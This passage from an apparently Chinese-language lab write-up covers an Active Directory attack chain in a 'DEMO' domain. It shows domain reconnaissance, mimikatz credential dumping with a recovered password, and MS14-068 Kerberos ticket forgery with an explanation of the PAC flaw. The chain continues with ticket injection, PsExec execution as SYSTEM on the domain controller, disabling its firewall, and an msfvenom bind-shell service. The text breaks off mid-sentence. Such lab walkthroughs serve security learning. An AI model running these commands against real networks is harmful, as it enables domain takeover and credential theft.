src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"471\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-10.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2016\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u62ff\u4e0b\u4e86<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5148\u5bf9\u57df\u505a\u4e00\u4e0b\u4fe1\u606f\u641c\u96c6<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\"><a><\/a>chcp 65001<br>net user<br>net view<br>net view \/domain<\/p>\n<\/blockquote>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-11.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"840\" height=\"346\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-11.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2017\"  sizes=\"auto, (max-width: 840px) 100vw, 840px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-12.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"184\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-12.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2018\"  sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u4e24\u53f0\u4e3b\u673a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u53ef\u4ee5\u770b\u5230\u5728DEMO\u8fd9\u4e2a\u57df\u91cc<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-13.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"707\" height=\"484\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-13.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2019\"  sizes=\"auto, (max-width: 707px) 100vw, 707px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5728\u4e3b\u673a\u7684\u684c\u9762\u4e86\u53d1\u4e0b\u4e00\u4e2aMS14-068.exe\uff0c\u53ef\u80fd\u662fhint<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>mimikatz\u5bfc\u51fa\u5bc6\u7801\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-14.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"542\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-14.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2020\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u57df\u6210\u5458sid\uff1aS-1-5-21-979886063-1111900045-1414766810-1107<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u53d1\u73b0\u7528\u6237\u5bc6\u7801 douser Dotest123 \uff0c WIN-ENS2VR5TR3N \u4e3a\u57df\u63a7<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a><strong>\u7528 MS14-068 \u751f\u6210\u4f2a\u9020\u7968\u636e<\/strong><\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\"><a><\/a>MS14-068.exe -u douser@demo.com -p Dotest123 -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130<\/p>\n<\/blockquote>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-15.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"157\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-15.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2021\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u751f\u6210\u6210\u529f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u8fd9\u4e2a .ccache \u7684\u4f5c\u7528\u662f\uff1a\u5b83\u662f MS14-068 \u751f\u6210\u7684 Kerberos \u7968\u636e\u7f13\u5b58\u6587\u4ef6\u3002\u540e\u9762\u7528 mimikatz \u6ce8\u5165\u5b83<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>MS14-068 \u5bf9\u5e94 CVE-2014-6324\uff0c\u672c\u8d28\u662f Windows KDC \u5bf9 Kerberos PAC \u7b7e\u540d\u6821\u9a8c\u4e0d\u4e25\u683c\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>Kerberos \u7968\u636e\u91cc\u6709\u4e00\u4e2a PAC\uff0c\u91cc\u9762\u8bb0\u5f55\u7528\u6237\u8eab\u4efd\u3001\u7ec4 SID\u3001\u6743\u9650\u7b49\u4fe1\u606f\u3002\u6b63\u5e38\u60c5\u51b5\u4e0b\uff0cKDC \u5e94\u8be5\u4e25\u683c\u6821\u9a8c PAC \u662f\u5426\u53ef\u4fe1\u3002\u6f0f\u6d1e\u5b58\u5728\u65f6\uff0c\u666e\u901a\u57df\u7528\u6237\u53ef\u4ee5\u6784\u9020\u4e00\u4e2a\u5e26\u6709\u9ad8\u6743\u9650\u7ec4 SID \u7684\u4f2a\u9020 PAC\uff0c\u4f8b\u5982\u628a\u81ea\u5df1\u201c\u58f0\u660e\u201d\u4e3a Domain Admins\uff0c\u7136\u540e\u8ba9 KDC \u7b7e\u53d1\u4e00\u4e2a\u88ab\u57df\u5185\u670d\u52a1\u63a5\u53d7\u7684\u7968\u636e\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u6240\u4ee5\u5b83\u4e0d\u662f\u5bc6\u7801\u7206\u7834\uff0c\u4e5f\u4e0d\u662f SMB \u6f0f\u6d1e\uff0c\u800c\u662f\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u666e\u901a\u57df\u7528\u6237\u51ed\u636e-&gt; \u6784\u9020\u4f2a\u9020 PAC-&gt; \u5411\u672a\u4fee\u8865 DC \u8bf7\u6c42 Kerberos \u7968\u636e-&gt; \u6ce8\u5165\u7968\u636e-&gt; \u4ee5\u9ad8\u6743\u9650\u8bbf\u95ee\u57df\u63a7\u8d44\u6e90<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u6210\u529f\u540e\u5e38\u89c1\u9a8c\u8bc1\u65b9\u5f0f\u662f\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>dir \\\\\u57df\u63a7\u4e3b\u673a\u540d\\c$<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u6ce8\u610f\u6700\u597d\u7528\u57df\u63a7\u4e3b\u673a\u540d\u6216 FQDN\uff0c\u4e0d\u8981\u76f4\u63a5\u7528 IP\u3002\u7528 IP \u8bbf\u95ee SMB \u65f6\u53ef\u80fd\u8d70 NTLM\uff0c\u5bfc\u81f4 Kerberos \u7968\u636e\u6ca1\u6709\u88ab\u6b63\u786e\u4f7f\u7528\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>MS14-068 \u7684\u5173\u952e\u70b9\u4e0d\u662f\u201c\u62ff\u5230\u57df\u63a7\u5bc6\u7801\u201d\uff0c\u800c\u662f\u201c\u5229\u7528 KDC \u5bf9 PAC \u6821\u9a8c\u7f3a\u9677\uff0c\u8ba9\u666e\u901a\u57df\u7528\u6237\u83b7\u5f97\u4e00\u5f20\u5305\u542b\u9ad8\u6743\u9650\u7ec4 SID \u7684\u5408\u6cd5 Kerberos \u7968\u636e\u201d\u3002\u56e0\u6b64\u5229\u7528\u524d\u63d0\u662f\uff1a\u57df\u63a7\u672a\u6253\u8865\u4e01\u3001\u5df2\u6709\u666e\u901a\u57df\u7528\u6237\u8d26\u53f7\u5bc6\u7801\u3001\u77e5\u9053\u7528\u6237 SID\u3001\u80fd\u8bbf\u95ee\u57df\u63a7 88 \u7aef\u53e3\uff0c\u5e76\u4e14\u672c\u673a\u65f6\u95f4\u4e0e\u57df\u63a7\u540c\u6b65\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u7528 mimikatz \u6ce8\u5165\u7968\u636e<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mimikatz.exe\nprivilege::debug\nkerberos::purge\nkerberos::list\nkerberos::ptc TGT_douser@demo.com.ccache\nkerberos::list<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-16.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"565\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-16.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2022\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-17.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"489\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-17.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2023\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u9a8c\u8bc1\u662f\u5426\u5df2\u7ecf\u80fd\u8bbf\u95ee\u57df\u63a7<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>net use \\\\WIN-ENS2VR5TR3N\\c$<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>dir \\\\WIN-ENS2VR5TR3N\\c$<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-18.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"450\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-18.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2024\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u6210\u529f\u4e86\u3002\u8fd9\u4e2a\u7ed3\u679c\u5c31\u8bf4\u660e MS14-068 \u7968\u636e\u6ce8\u5165\u6709\u6548<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u4ecekali\u4e0a\u4f20\u4e00\u4e2aPsExec64.exe<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>meterpreter &gt; upload \/path\/to\/PsExec64.exe C:\/Windows\/Temp\/PsExec64.exe<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u7136\u540e\u5728 Win7 shell \u91cc\u6267\u884c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>C:\\Windows\\Temp\\PsExec64.exe \/accepteula \\\\WIN-ENS2VR5TR3N cmd<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5982\u679c\u8981 SYSTEM\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><a><\/a>C:\\Windows\\Temp\\PsExec64.exe \/accepteula -s \\\\WIN-ENS2VR5TR3N cmd<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-19.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"832\" height=\"278\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-19.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2025\"  sizes=\"auto, (max-width: 832px) 100vw, 832px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>error code 0 \u8868\u793a\u8fdc\u7a0b cmd \u6b63\u5e38\u542f\u52a8\u5e76\u9000\u51fa\u3002Meterpreter \u91cc\u7684\u666e\u901a shell \u5bf9 PsExec \u4ea4\u4e92\u652f\u6301\u4e0d\u597d\uff0c\u6240\u4ee5\u5b83\u5f00\u4e86 cmd \u4f46\u9a6c\u4e0a\u9000\u4e86\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u8bf4\u660e PsExec \u5df2\u7ecf\u80fd\u5728\u57df\u63a7\u4e0a\u6267\u884c\u547d\u4ee4\u4e86,\u53ea\u662f whoami \u6ca1\u663e\u793a\u51fa\u6765\uff0c\u5e38\u89c1\u662f &amp; \u5728\u5f53\u524d cmd\/meterpreter shell \u91cc\u89e3\u6790\u4e0d\u7a33\u5b9a\uff0c\u6216\u8005\u8f93\u51fa\u6ca1\u6709\u5b8c\u6574\u56de\u663e\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u76f4\u63a5\u5199\u6587\u4ef6\u9a8c\u8bc1<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<pre class=\"wp-block-code\"><code>C:\\Windows\\Temp\\PsExec64.exe \/accepteula -s \\\\WIN-ENS2VR5TR3N cmd \/c \"C:\\Windows\\System32\\whoami.exe > C:\\Windows\\Temp\\dc_who.txt 2>&amp;1\"\ntype \\\\WIN-ENS2VR5TR3N\\c$\\Windows\\Temp\\dc_who.txt<\/code><\/pre>\n<\/blockquote>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-20.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"675\" height=\"128\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-20.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2026\"  sizes=\"auto, (max-width: 675px) 100vw, 675px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5173\u95edDC\u7684\u9632\u706b\u5899\uff1a<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<pre class=\"wp-block-code\"><code><a><\/a>C:\\Windows\\Temp\\PsExec64.exe \/accepteula -s \\\\WIN-ENS2VR5TR3N cmd \/c \"netsh advfirewall set allprofiles state off\"<\/code><\/pre>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u751f\u6210msf\u6728\u9a6c\uff1a<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\"><a><\/a>msfvenom -p windows\/x64\/meterpreter\/bind_tcp LPORT=7777 -f exe -o dc_bind.exe<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u628a\u5b83\u4f20\u5230 Win7<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\"><a><\/a>meterpreter &gt; upload dc_bind.exe C:\/Windows\/Temp\/dc_bind.exe<\/p>\n<\/blockquote>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-21.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"254\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-21.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2027\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5728 Win7 \u7684 shell \u91cc\u590d\u5236\u5230\u57df\u63a7\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>copy C:\\Windows\\Temp\\dc_bind.exe \\\\WIN-ENS2VR5TR3N\\c$\\Windows\\Temp\\dc_bind.exe<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-22.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"920\" height=\"169\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-22.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2028\"  sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u7136\u540e\u5728\u57df\u63a7\u4e0a\u521b\u5efa\u670d\u52a1\u6267\u884c\uff1a<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"wp-block-code\"><code>sc \\\\WIN-ENS2VR5TR3N create dcbind binPath= \"C:\\Windows\\Temp\\dc_bind.exe\"sc \\\\WIN-ENS2VR5TR3N start dcbind\n# \u63a5\u7740 MSF \u76d1\u542c bind\uff1a\nuse exploit\/multi\/handler\nset payload windows\/x64\/meterpreter\/bind_tcp\nset RHOST 192.168.183.130\nset LPORT 7777\nset AutoRunScript post\/windows\/manage\/migrate\nrun<\/code><\/pre>\n<\/div><\/div>\n<\/div><\/div>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-23.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"776\" height=\"300\" data-original=\"https:\/\/koishi.team\/wp-content\/uploads\/2026\/05\/image-23.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2029\"  sizes=\"auto, (max-width: 776px) 100vw, 776px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>msf\u6709\u5f39\u8fc7\u6765\uff0c\u4f46\u662f\u62a51053\uff0c\u592a\u4e0d\u7a33\u5b9a\u4e86\uff0c\u540e\u9762\u7684\u64cd\u4f5c\u548c\u524d\u9762\u7684\u4e00\u6837\uff0c\u6293\u5bc6\u7801\uff0c\u53ef\u4ee5\u5f00\u542f3389\uff0c\u7136\u540e\u8fdc\u7a0b\u767b\u5f55\uff08\u9700\u8981\u4e00\u4e2a\u8f6c\u53d1\u7684\u96a7\u9053\uff09,\u5199\u9ec4\u91d1\u7968\u636e<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a><\/a>\u5f00<strong>&nbsp;MSF 